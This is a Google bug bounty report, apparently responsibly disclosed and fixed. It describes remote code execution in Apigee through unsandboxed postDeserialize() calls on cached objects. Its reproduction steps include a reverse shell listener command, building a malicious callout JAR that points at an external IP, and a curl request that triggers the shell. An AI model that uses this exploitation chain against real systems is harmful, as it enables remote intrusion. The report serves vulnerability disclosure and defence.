Skip to Content (Press Enter)
Google
Bug Hunters
Remote Code Execution vulnerability in LookupCache policy in Google Apigee allows attacker to execute arbitrary Java code by specially crafted cache entry
Google VRP
triaged
02:41 | Mar 16, 2023
accepted
22:10 | Mar 16, 2023
fixed
17:17 | Aug 21, 2023
reward decided
$1,337
Summary:
Remote Code Execution vulnerability in LookupCache policy in Google Apigee allows attacker to execute arbitrary Java code by specially crafted cache entry
Product:
Apigee
Vulnerability type:
Remote Code Execution (RCE)
Details
Hi Google Security team,
Using policies for general purpose caching, you can persist any objects your proxy requires across multiple request/response sessions
I noticed that when Apigee retrieves cache entry, it also invokes postDeserialize() method on the retrieved entry value, if entry value is an object of com.apigee.util.PostDeserializer class. Moreover, execution of this method is not sandboxed with Java Permissions, which opens a possibility to run arbitrary code.
Attack scenario
The vulnerability can be exploited by a remote attacker.
The attacker can execute arbitrary Java code. The attacker can bind a reverse shell.
In short, to exploit this you need to:
Craft special object, which must be an implementation of com.apigee.util.PostDeserializer class. This object must contain postDeserialize() method with arbitrary Java code.
Put this object into some message context variable.
Put message context variable into the cache via PopulateCache policy.
Retrieve the object via LookupCache policy.
I have created PoC proxy for you as well as Java project.
Steps to Reproduce
Setup reverse shell listener on your publicly available server with the following command:
nc -lvnp 8899
Download PoC proxy from the attachments (java-and-cache-rce_rev3_2023_03_15.zip).
Create a proxy in the Apigee UI and upload PoC proxy bundle into it.
Download Java project from the attachments (demo.zip).
Unzip and open Java project in your favorite IDE (you need Java 11/OpenJdk 11).
Open src/main/java/com/apigeesamplerce/App.java.
On the line 18 change IP 35.205.178.244 to the IP address of your publicly available server. You can also change a port if you want. Save the file.
Build Java project with the following commands:
mvn install:install-file \
  -Dfile=expressions-1.0.0.jar \
  -DgroupId=com.apigee.edge \
  -DartifactId=expressions \
  -Dversion=1.0.0 \
  -Dpackaging=jar \
  -DgeneratePom=true

 mvn install:install-file \
  -Dfile=message-flow-1.0.0.jar \
  -DgroupId=com.apigee.edge \
  -DartifactId=message-flow \
  -Dversion=1.0.0 \
  -Dpackaging=jar \
  -DgeneratePom=true

 mvn install:install-file \
  -Dfile=util-1.0.0.jar \
  -DgroupId=com.apigee.edge \
  -DartifactId=util \
  -Dversion=1.0.0 \
  -Dpackaging=jar \
  -DgeneratePom=true

mvn clean package
After successful building locate demo-1.0-SNAPSHOT.jar under target directory in the Java project.
Upload demo-1.0-SNAPSHOT.jar into your proxy via Apigee UI. You can do it by clicking on Add Resource button (➕) on Resources directory on the left side of Develop Tab of the Apigee UI - choose JAR resource type, choose demo-1.0-SNAPSHOT.jar as file and click Add.
Save revision and deploy your proxy.
Replace DOMAIN in the following command with domain name of the Apigee instance. Trigger reverse shell by sending get request to your proxy.
curl https://DOMAIN/java-and-cache-rce/rce
Observe reverse shell connection
PoC explanation
PoC proxy contains 3 policies:
JAVA-1 - JavaCallout policy which creates malicious object with reverse shell payload and stores this object in
cache_str
context variable.
PC-1 - PopulateCache policy, which takes malicious object from
cache_str
context variable and puts it into a cache
LC-1 - LookupCache policy, which retrieves the object from the cache and executes its postDeserialize() method
登录
使用 Google 账号登录